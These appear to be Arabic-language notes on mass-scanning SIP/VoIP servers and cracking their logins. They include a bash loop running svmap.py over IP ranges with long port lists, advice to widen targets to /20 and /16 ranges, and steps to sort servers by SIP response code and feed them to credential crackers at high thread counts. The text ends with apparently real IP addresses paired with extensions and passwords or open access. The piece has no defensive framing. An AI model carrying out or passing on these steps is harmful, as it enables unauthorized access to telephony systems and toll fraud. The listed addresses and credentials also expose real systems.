رسالة 
405 Method Not Allowed
لازم تؤخد يوزر وباسورد صحيح , بعدها حيتصل دون ذلك ما فى اتصال
مثال
188.165.50.39

10001
12345
=============================================

بعد السحب الكامل للرنجات

5060
نقوم باستبدال 5060 الى /20
نقوم بعملية سكان بورتات مختلفة 
-p5060-5099,6060-6065,14310,9090,1025,1153,10243
او 


#!/bin/bash


function fuck () {

sudo python svmap.py -v -p5060-5099,6060-6065,14310,9090,1024-1030,1153,10243,7060,8060,9060,7061,8061,9061,27036,5009,5190,5297,5353,5678,6802,10602,10600,6250,1720 -t0.0 $target >>result.txt
}

for target in `cat range.txt`
do 
echo $target 
fuck $target &
sleep 0.5
done

إختر ما يحلو لك
-p5000-5100,6060-6090,14310,9090,1153,10243,4569,8080,5723,1024-1030,10000-10010,7060,8060,9060,6061,7061,8061,9061,2000-2021,3478,13000-13001,4379-4380,27000-27031,27036,16384-16400,9000-9050,3722-3730,12000-17000,1234-1237,5009,5190,5297,5353,5678,6802,10602,10600,6250,1720,3230-3237,69,8000-8005
قد يكون فى داخل نطاق /20 ايبيهات غير موجودة بالقائمة وتظهر بالبورتات الجديدة 

بخصوص الكراك يفضل استخدام perl crack
وعمل كومبو محترمة user:pass
استخدام 5 نسخ فى كل خادم على ثريد 1000 لكل نسخة 
----------------------------------------------------
استخدام سكربت البرفكس perl call 
405 وغيرها



سحب كامل الايبيهات عبرsvmap

فقط 5060
فرز الرسائل حسب رقمها

403 Forbidden
404 Not Found
    
403  404
ارسالهم للكراك على MGK

 405 Method Not Allowed
على البروق مع استخدام يوزر وباس صغيرة

استخدام MGK 
نظام رنجات مستهدفة /16 
مع بعض البورتات الاشهر 
وكراك اتوماتيك

استخدام ملف الريزلت عل  تست بيرفكس بهذا التنسيق
101.132.25.55:5060:3001:daoyou
101.35.137.70:5060:1000:<noauth>
103.158.49.147:5060:101:<noauth>
